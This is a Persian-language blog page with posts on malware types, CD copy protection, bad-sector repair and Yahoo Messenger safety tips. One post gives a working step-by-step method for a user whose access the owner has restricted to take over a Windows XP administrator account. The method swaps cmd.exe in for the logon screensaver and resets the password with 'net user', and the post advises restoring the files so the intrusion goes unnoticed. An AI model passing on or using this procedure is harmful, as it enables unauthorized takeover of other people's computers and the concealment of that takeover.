وبلاگ پس گرفته شده توسط هکرهای وب سایت

درباره وبلاگ

ما یاد گرفتیم که پاینده بمانیم
در تاب و تب عشق فروزنده بمانیم
در شعر و قلم، خسته و شوریده چنان شمع
در غم خوری مردم خود، زنده بمانیم
دوستان سلام
جمعی از جوانان سده گرد هم آمدیم تا برای یک لحظه هم که شده سده را فریاد بزنیم
گاهی بخندیم و گاهی بگرییم
آمدیم تا بگوییم سده هست
ما هم هستیم
سده همچنان سرافراز خواهد ماند
همراهی شما دلگرمی ماست
واژه ای هست کزو مست و رها جان منست
لاله زاری که همان مظهر ایمان منست
آن که چشمان جهان خیره به اسرارش شد
دل من، جان من و کشور ایران منست
زنده باد سده
زنده باد خلیج فارس

پیوندها

عکس های تاسف انگیز نیکی کریمی در فرانسه
طرفداران PES2008
بزرگترین منبع کدهای جاوا
لینکستان بزرگ وبلاگ بزرگ سده
پایگاه بزرگ مارک
:: قالب ساز ::

طراح قالب

آشنايي با انواع مختلف برنامه‌هاي مخرب

آشنايي با انواع مختلف برنامه‌هاي مخرب

E-mail virus

ويروسهايي كه از طريق E-mail وارد سيستم مي‌شوند معمولاً به صورت مخفيانه درون يك فايل ضميمه شده قرار دارند که با گشودن يك صفحه ی HTML يا يك فايل قابل اجراي برنامه‌اي (يك فايل كد شده قابل اجرا) و يا يك word document می توانند فعال‌ شوند.

Marco virus

اين نوع ويروسها معمولاً به شکل ماکرو در فايلهايي قرار می گیرند كه حاوي صفحات متني (word document) نظير فايلهاي برنامه‌هاي Ms office ( همچون microsoft word و Excel )هستند .
توضيح ماكرو: نرم افزارهايي مانند microsoft word و Excel اين امکان را برای كاربر بوجود می آورند كه در صفحه متن خود ماكرويي ايجاد نماید،اين ماكرو حاوي يكسري دستور العملها، عمليات‌ و يا keystroke ها است كه تماماً توسط خود كاربر تعيين ميگردند.
ماكرو ويروسها معمولاً طوري تنظيم شده‌اند كه به راحتي خود را در همه صفحات متني ساخته شده با همان نرم افزار (Excel , ms word) جاي مي‌‌دهند.

اسب تروآ:

اين برنامه حداقل به اندازه خود اسب تروآي اصلي قدمت دارد . عملكرد اين برنامه‌ها ساده و در عین حال خطرناك است.
در حاليكه كاربر متوجه نیست و با تصاویر گرافیکی زیبا و شاید همراه با موسیقی محسور شده ، برنامه عملیات مخرب خود را آغاز می کند.
براي مثال به خيال خودتان بازي جديد و مهيجي را از اينترنت Download كرده‌ايد ولي وقتي آنرا اجرا مي‌كنيد متوجه خواهيد شد که تمامی فايلهاي روي هارد ديسك پاك شده و يا به طور كلي فرمت گرديده است.

كرمها (worm)

برنامه كرم برنامه‌اي است كه با كپي كردن خود توليد مثل مي‌كند. تفاوت اساسي ميان كرم و ويروس اين است كه كرمها براي توليد مثل نياز به برنامة ميزبان ندارند. كرمها بدون استفاده از يك برنامة حامل به تمامي سطوح سيستم كامپيوتري «خزيده» و نفوذ مي‌كنند. راجع به اینگونه برنامه ها در فصل سوم مفصلا بحث خواهد شد.

ويروسهاي بوت سكتور و پارتيشن

Boot sector قسمتی از ديسك سخت و فلاپي ديسك است كه هنگام راه اندازی سيستم از روي آن به وسيله كامپيوتر خوانده مي‌شود. Boot Sector یا ديسك سيستم ، شامل كدي است كه براي بار كردن فايلهاي سيستم ضروري است. این ديسكها داده هایی در خود دارند و همچنین حاوي كدي هستند كه براي نمايش پيغام راه اندازی شدن کامپیوتر بوسیله ی آن لازم است .
سكتور پارتيشن اولين بخش يك ديسك سخت است كه پس از راه‌اندازي سيستم خوانده مي‌شود. اين سكتور راجع به دیسک اطلاعاتي نظیر تعداد سكتورها در هر پارتيشن و نیز موقعيت همه ی پارتيشن‌ها را در خود دارد.
سكتور پارتيشن، ركورد اصلي راه‌اندازي يا Master Boot Record -MBR نيز ناميده مي‌شود.
بسياري ازكامپيوترها به گونه ای پيكربندي شده‌‌اند كه ابتدا از روي درايو: A راه‌اندازي میشوند. (اين قسمت در بخش Setup سيستم قابل تغيير و دسترسي است) اگر بوت سكتور يك فلاپي ديسك آلوده باشد، و شما سیستم را از روي آن راه‌اندازي كنيد، ويروس نيز اجرا شده و ديسك سخت را آلوده مي‌كند.
اگر ديسكی حاوي فايلهاي سيستمي هم نبوده باشد ولي‌ به يك ويروس بوت سكتوري آلوده باشد وقتی اشتباهاً ديسكت را درون فلاپي درايو قرار دهيد و كامپيوتر را دوباره‌ راه‌اندازي كنيد پيغام زير مشاهده مي‌شود. ولي به هر حال ويروس بوت سكتوري پيش از اين اجرا شده و ممكن است كامپيوتر شما را نيز آلوده كرده باشد.
Non-system disk or disk error
Replace and press any key when ready

كامپيوترهاي بر پايه Intel در برابر ويروسهاي Boot Sector و Partition Table آسيب پذير هستند.
تا قبل از اینکه سیستم بالا بیاید و بتواند اجرا شود صرفنظر از نوع سیستم عامل می تواند هر کامپیوتری را آلوده سازد.

HOAX (گول زنك‌ها)

اين نوع ويروسها در قالب پيغامهاي فريب آميزي ، كاربران اينترنت را گول زده و به كام خود مي‌كشد. اين نوع ويروسها معمولاً به همراه يك نامه ضميمه شده از طريق پست الكترونيك وارد سيستم مي‌شوند. متن نامه مسلماً متن مشخصي نیست و تا حدودي به روحيات شخصي نويسنده ويروس بستگی دارد، پیغامها می توانند مضمونی تحدید آمیز یا محبت آمیز داشته باشند و یا در قالب هشداری ، مبنی بر شیوع یک ویروس جدید ئر اینترنت ، یا درخواستی در قبال یک مبلغ قابل توجه و یا هر موضوع وسوسه انگیز دیگر باشد . لازم به ذکر است كه همه اين نامه‌ها اصل نمي‌باشند يعني ممكن است بسیاری از آنها پيغام شخص سازنده ويروس نباشند بلكه شاید پيغام ويرايش شده يا تغيير یافته از يك كاربر معمولي و يا شخص ديگري باشد كه قبلا اين نامه‌ها را دريافت كرده و بدينوسيله ويروس را با پيغامي كاملاً جديد مجدداً ارسال مي‌كند.
نحوه تغيير پيغام و ارسال مجدد آن بسيار ساده بوده ، همين امر باعث گسترش سريع Hoax‌ها شده،‌ با يك دستور Forward مي‌توان ويروس و متن تغيير داده شده را براي شخص ديگري ارسال كرد. اما خود ويروس چه شكلي دارد؟ ويروسي كه در پشت اين پيغامهاي فريب آميز مخفي شده مي‌تواند به صورت يك بمب منطقي ، يك اسب تروا و يا يكي از فايلهاي سيستمي ويندوز باشد. شيوه‌اي كه ويروس Magistre-A از آن استفاده کرده و خود را منتشر مي‌كند.

SULFNBK يك ويروس، يك شوخي و يا هردو؟!

سايت خبري سافس چندي پيش خبري مبني بر شناخته شدن يك ويروس جديد منتشر كرد، ويروسي با مشخصه SULFNBK (SULFNBK.EXE)که ممکن است نام آن اغلب برای شما آشنا باشد .

SULFNBK.EXE نام فايلي در سيستم عامل ويندوز 98می باشد كه وظيفه بازيابي اسامي طولاني فايلها را به عهده دارد و در سيستم عامل ويندوز 98 فایلی سودمند می باشد .
اینجاست که می توان به مفهوم واقی HOAX ها پی برد ، فایل SULFNBK.EXE که معمولا از طریق پست الکترونیکی به همراه یک نامه ی فریب آمیز و شاید تهدید آمیز به زبان پروتکلی وارد سیستمها می شود دقیقا در جایی ساکن می شود که فایل سالم SULFNBK.EXEدر آنجاست به بیان بهتر اینکه جایگزین آن فایل سالم می شود. فايل SULFNBK.EXE آلوده در شاخه Command ويندوز 98 ساكن شده و چون به همان شکل و سايز مي‌باشد به همين منظور كاربر متوجه حضور يك ويروس جديد در سيستم خود نخواهد شد ، اينجاست كه فریب خورده، ويروس خطرناك Magistre-A كه در هسته اين فايل وجود دارد در اول ماه ژوين فعال شده و سازنده خود را به مقصودش مي‌رساند. نسخه‌اي ديگر از اين ويروس را مي‌توان يافت كه در 25 ماه مي فعال می شود. تفاوتي كه این ویروس نسخه قبلي خود دارد آنست كه روي فايل SULFNBK.EXE آلوده در درايو C ساكن مي‌شود. لازم به ذكر است اين ويروس در سيستم عامل ويندوز 98فعال شده و حوزه فعاليتش در درايو C مي‌باشد.
تشخيص اينكه فايل SULFNBK.EXE واقعاً آلوده است يا خير دشوار می باشد . البته شايد بعد از ماه ژوئن 2002 از طریق ویروس یابهای جدید مانند Norton Mcafee بتوان آنها را تشخیص داد ، اما در صورت در سترس نبودن ویروس یابهای مذکور ، حداقل می توان SULFNBK.EXE را چه آلوده و چه غیر آلوده پاک کرد ، البته از آنجايي كه فايل SULFNBK.EXE يك فايل سيستمي ويندوز به شمار مي‌رود ممكن است پاك كردن آن به سيستم عامل لطمه وارد كند، از اينرو بد نيست قبل از پاك كردن، نسخه‌اي از آن را بر روي يك فلاپي كپي كرده و نگه داريم. حقيقت آنست كه كمتر كسي ریسک می کند و این قبیل فایلها را اجرا می کند .
پيغامي كه ضميمه اين فايل ارسال مي‌شود نيز در چندین نسخه وجود دارد. همانطور كه قبلا ذکر شد نسخه ی اصل پیغام به زبان پرتغالي است اما ترجمه ی انگليسي و اسپانيولي آن میز یافت شده است .
به هرحال هر ويروس چه از نوع HOAX باشد و چه از انواع ديگر، مدتی چه طولانی و چه کوتاه روي بورس است و معمولاً لطمه‌هاي جبران ناپذیر خود را در همان بدو تولد به جاي گذاشته و بعد از مدتي مهار مي‌شود . نكته ی قابل توجه اینست كه با داشتن خداقل آشنایی از این ویروسها در همان شروع کار به راحتی مي‌توان با نسخه‌هاي جديدتر آن ويروس و يا ويروسهاي مشابه مبارزه كرد.

CELLSAVER يك اسب تروا

a.k.a CellSaver- Celcom Screen Saver نير ويروسي از نوع HOAX مي‌باشد و علیرغم مدت زیادی که از اولین انتشار آن می گذرد کاربران زیادی را دچار مشکل ساخته است . اين ويروس برای کاربران اینترنت ارسال شده است . نسخه نخست آن در سال 1998 و نسخه جديدتر آن كمي بعد در آوريل 1999 به همراه يك پيغام دروغين منتشر شد.
هرگاه نامه‌اي با عنوان CELLSAVER.EXE به همراه فايلي با همين نام دريافت كرديد سریعا آنرا پاك کرده و از Forward كردن براي شخصی ديگر بپرهيزبد ،اينكار هيچ گونه لذتي نداشته ، فقط به انتشار و بقای بيشتر آن كمك می کند .
اين فايل يك اسب تروا كامل مي‌باشد ، يك فايل Screen Saver زيبا براي ويندوز که به محض اجرا شدن هر كسي را مجذوب و مسحور مي‌گرداند.
احتياط كنيد! CELLSAVER.EXE به محض اجرا شدن ، يك گوشي تلفن بي‌سيم Nokia را بصورت یک Screen Saver بر روی صفحه نمايش نشان مي دهد . در صفحه نمايش اين گوشي، می توان زمان و پيغامهارا ديد. بعد از يكبار اجرا شدن، ويروس فعال شده و شما خيلي زود متوجه خواهيد شد كه سيستم بسيار كند عمل کرده ، قادر به بوت شدن نخواهد بود و اطلاعات رود هارد ديسك نيز پاكسازي مي‌شوند .در نتیجه مجبور به نصب مجددكليه برنامه‌ها خواهيد بود.
در آخر باز هم يادآور مي‌شويم كه هرگز نامه های دريافتي كه كمي ناشناخته و مشكوك به نظر مي‌رسند را باز نكنيد.

ويروسهاي چند جزئي Multipartite virus

بعضي از ويروسها، تركيبي از تكنيكها را براي انتشار استفاده کرده ، فايلهاي اجرائي، بوت سكتور و پارتيشن را آلوده می سازند. اينگونه ويروسها معمولاً تحت windows 98يا Win.Nt انتشار نمي‌يابند.

نوشته شده توسط ناصر پریشانی |

آموزش قفل گذاری بر روی cd

آموزش قفل گذاری بر روی سی دی

سلام ميخواهم به شما نحوه قفل گذاري بر روي سي دي را آموزش بدهم. اميدوارم كه خوشتان بيايد.
مواد لازم:
1- برنامه Nero
2- يكي از برنامه‌ويرايشگر فايلهاي ISO مانند winISO,ultraISO و ......
3- نرم افزار TZ Copy Protection كه ميتوانيد جديدترين نسخه اونرا از اينترنت جستجو كنيد

و اما روش كار:
1- ابتدا به سراغ برنامه WInISO رفته و يك ايمج از سي دي مورد نظر ميگيريم. براي اين كار از منوي Actions گزينه Make ISO from CDROM را انتخاب كنيد.
2- در قسمت Option گزينه file را انتخاب كرده و روي گزينه Make كليك ميكنيم. صبر كنيد تا اميج گرفته شود.
3- در مرحله بعد بايد ايمج گرفته شده را به فرمت BIN تبديل كنيم براي اين كار از منوي Convert گزينه ISO to BIN را انتخاب كنيد در قسمت اول فايل ايمج گرفته شده در مرحله قبل را انتخاب و در قسمت دوم محلي را كه ميخواهيد فايل مورد نظرتان در آن قرار بگيرد را انتخاب كنيد. نام فايل جديد را Image2 در نظر بگيريد. و برروي Convert كليك كنيد.
4- بعد از اتمام كار ديگه با اين برنامه كاري نداريم اون را ببنديد.

حال بايد به سراغ برنامه TZ Copy Protection برويم. اين برنامه با قرار دادن حداكثر 4 لايه قفل ميتواند به خوبي از سي دي شما محافظت كند. برنامه را اجرا كنيد:
1- در مرحله اول از گزينه Open فايل Image2.cue را باز كنيد.
2- بر روي Step1 در بالاي صفحه كليك كنيد تا قفل گذاري بر روي ترك صفر ايجاد شود. بعد از كليك بر روي اين گزينه پيغامي مبني بر اينكه قفل گذاري با موفقيت انجام شد داده ميشود. بر روي OK كليك كنيد.
3- حال براي امنيت بيشتر بايد يك سري ترك حاوي اطلاعات غير استاندارد ايجاد كنيم. در پايين صفحه بر روي Audio tracks to Add كليك كرده و عدد 32 را وارد كنيد تا 32 ترك غير استاندارد ايجاد شود. براي بالا رفتن امنيت ميتوانيد گزينه‌هايّ fix Four-Second و Use IFS (Inteleave File system) را علامت دار كنيد و سپس بر روي Step2 كليك كنيد.
4- در اين مرحله بايد با ايجاد قفل حجمي و بالا بردن حجم برخي از فايلها مانع از كپي گرفتن اطلاعات سي دي بر روي هارد ديسك شويم براي اين كار بر روي MB در پايين صفحه كليك كنيد و در جعبه متن بالا عدد 1500 را وارد كنيد يعني ميخواهيم حجم برخي از فايلها را به 1500 مگابايت برسانيم. حال يكي از فايلهاي اصلي برنامه را انتخاب كنيد و بر روي گزينه Step3 در بالاي صفحه كليك كنيد خواهيد ديد كه رنگ فايل تغيير ميكند و در جلوي آن حجم فايل نيز به بيش از 1500 مگابايت ميرسد.
5- از كليك كردن بر روي گزينه Step4 خود داري كنيد چرا كه اين مرحله تغييراتي بر روي سي دي ميدهد كه برخي از رايترها قابليت رايت آن را ندارند(البته به گفته سازندگان برنامه اين مرحله از امنيت فوق العاده بالايي برخوردار است . به هر حال امتخانش ضرر ندارد)
6- تا اينجا ما توانستيم 4 مرحله قفل بر روي سي دي قرار دهيم در پايان بايد بر روي گزينه step5 كليك كنيم تا فايل حاوي قفل ما را ايجاد كند. بعد از كليك روي اين گزينه پيغامي ظاهر ميشود بر روي گزينه yes كليك كنيد. صبر كنيد تا كار برنامه تمام شود سپس همه پنجره هاي اضافي را ببنديد.

اكنون فايل ما كاملا آماده براي رايت بر روي سي دي ميباشد.

برنامه نرو را باز كرده و وارد برنامه Nero Burning Rom شويد .
1- از گزينه recorder گزينه Image Recorder را انتخاب كنيد.
2- در پنجره اي كه باز ميشود فايل Image2.CUE را انتخاب كنيد.
3- در پنجره بعدي نيز بايد در قسمت Write method حالت Disk-at-Once/96 را انتخاب كنيد
4- سرعت رايت را بهتر است پايين انتخاب كنيد مثلا 12x
5- در پايان بر روي Burn كليك كرده تا عمليات رايت سي دي انجام شود.

البته یک چیزی هم برای دوستان حرفه ای که این روش هم اکنون در بازار شکسته شده ولی خیلی از مراکز از آن استفاده می کنند

نوشته شده توسط ناصر پریشانی |

چگونه بد سكتور را درست كنيم

همچنان كه از عمر هارد مي گذرد احتمال اشكال پيدا كردن آن بيشتر مي شود پس هميشه به فكر تهيه يك نسخه پشتيبان ( Back up ) از اطلاعات مهم خود باشيد تا در صورت بروز مشكل آن را بازيابي كنيد. و با خيال راخت به فكر تعمير هارد ديسك خود باشيد. سيستم عامل ويندوز نرم افزارهاي كمكي براي هارد ديسك همراه دارد كه هارد كامپيوتر شما را اسكن مي كند و در صورت بروز اشكال نسبت به رفع آن اقدام مي كند.

مراحل كار در ويندوز

روي My Computer دابل كليك كنيد

درايوي را كه مي خواهيد عيب يابي منيد انتخاب كنيد

Properties را از منوي File انتخاب كنيد. اكنون بايد يكسري اطلاعات و مشخصات از اين درايو در منوي Properties ببينيد.

تب Tools را انتخاب كنيد.

تكمه Check Now را از قسمت Error Checking كليك كنيد.

بسته به ورژن ويندوز خود گزينه "thorough" يا " Scan for and Attempt of Recovery Bad Sector" را انتخاب كنيد.

روي ري استارت كليك كنيد.

اكنون سلامت هارد ديسك شما چك مي شود در پايان بايد خدمت شما عزيزان عرض كنم كه نرم افزارهاي مفيد زيادي براي عيب يابي و تعمير هارد ديسك ها وجود دارد كه بهتر و قوي تر از نرم افزار استاندارد ويندوز عمل مي كنند ولي قبل از اينكه مشكلي براي هارد ديسك شما پيش بيايد بايد آن را نصب كرده باشيد.

نوشته شده توسط ناصر پریشانی |

چگونه رمز عبور admin را در ويندوز xp هك كنيم.

چگونه رمز عبور admin را در ويندوز xp هك كنيم.

اگر با كامپيوتري كار مي كند كه روي آن ويندوز xp نصب شده است و دسترسي شما بوسيله كاربر اصلي محدود شده است. آنگاه dos prompt را باز كنيد سپس اين دستورات را وارد نمائيد.

اين دستور شما را به شاخه اصلي مي برد. /cd

اين دستور شما را به شاخه system 32 راهنمايي مي كند. cd/windows/system 32 فولدر temphack را براي شما ايجاد مي كند. mkdir temphack

يك فايل Back up (پشتيبان) از فايل logon.scr ايجاد مي كند. copy logon.scr temphack/ logon.scr

يك فايل پشتيبان از cmd.exe ايجاد مي كند. copy cmd.exe temphack/ cmd.exe

فايل اصلي logon.scr را پاك مي كند. del logon.scr

فايل cmd.exe رابه logon.scr تغيير نام مي دهد. rename cmd.exe logon.scr

از commond prompt خارج مي شويد. exit

كاري كه شما انجام داده ايد از اين قرار است كه يك فايل پشتيبان از برنامه commond و screen saver تهيه كرده سپس كاري كرده ايد كه زمانيكه ويندوز screen saver را فراخواني مي كند يك پنجره حفاظت نشده dos prompt در برابر شما ظاهر مي شود.

به محض ظاهر شدن اين پنجره دستور داخل گيومه را وارد كنيد.

net user<نام Admin را اينجا قرار دهيد>password

مثلاً اگر نام Admin كلمه Ali باشد و شما blah password را مي خواهيد كافيست تايپ كنيد.

”net user Ali blah“

اين عمل رمز عبور را به blah تغيير مي دهد.

نكته: به خاطر داشته باشيد كه محتويات temphack را دوباره به شاخه system 32 برگردانيد تا نفوذ شما لو نرود.

راه ديگري هم براي اين عمل وجود دارد و آن استفاده از ديسكت راه انداز است. كه مي توانيد آن را از مسير زير دنلود كنيد. اين روش مخصوصاً زمانيكه رمز عبور خود را فراموش كرده ايد بسيار مفيد خواهد بود.

نوشته شده توسط ناصر پریشانی |

چگونه در ياهو مسنجر با هك مقابله كنيم؟

چگونه در ياهو مسنجر با هك مقابله كنيم؟

معمول ترين و آسانترين راه برای هكران، هك در ياهو مسنجر است!

چگونه در ياهو مسنجر با هك مقابله كنيم؟

در ياهو مسنجر جديد براي مقابله با هك تنظيمات مناسب جدي را در اختيار قرار داده است
براي فعال كردن آن مي بايستي
1- گزينه login را در ياهو مسنجر انتخاب كنيد.
2- روي گزينه preferences ... كليك نماييد.
3- در صفحه اي كه باز مي شود گزينه firewall with no proxies را انتخاب كنيد.
4- سپس ok كنيد.
5- از ياهو مسنجر خارج شده دوبارهlogin نماييد.
ا كنون ياهو مسنجر شما داراي firwall مي باشد.

نكات ايمني براي مقابله با هك

1- از دريافت فايل هاي ناشناس جدداً خودداري كنيد.
2- چنانچه فايلي دريافت كرديد قبل از اجرا، راست كليك كرده و با مطالعه properties از نوع فايل مطمئن باشيد فايل اجرايي نمي باشد.
3- عكس هاي غالباً با پسوند .jpg و .gif مي باشد. در صورتي كه پسوند هاي مشكوك و يا اجرايي مانند .exe داشت با shift+delet آن را پاك كنيد.
4- از voice chat بپرهيزيد.
5- چنانچه به شخصي مشكوك هستيد يا ايجاد مزاحمت مي نمايد id شخص را به هيچ وجه add نكرده و در صورت add بودن delet كنيد و سپس ignore نماييد

نوشته شده توسط ناصر پریشانی |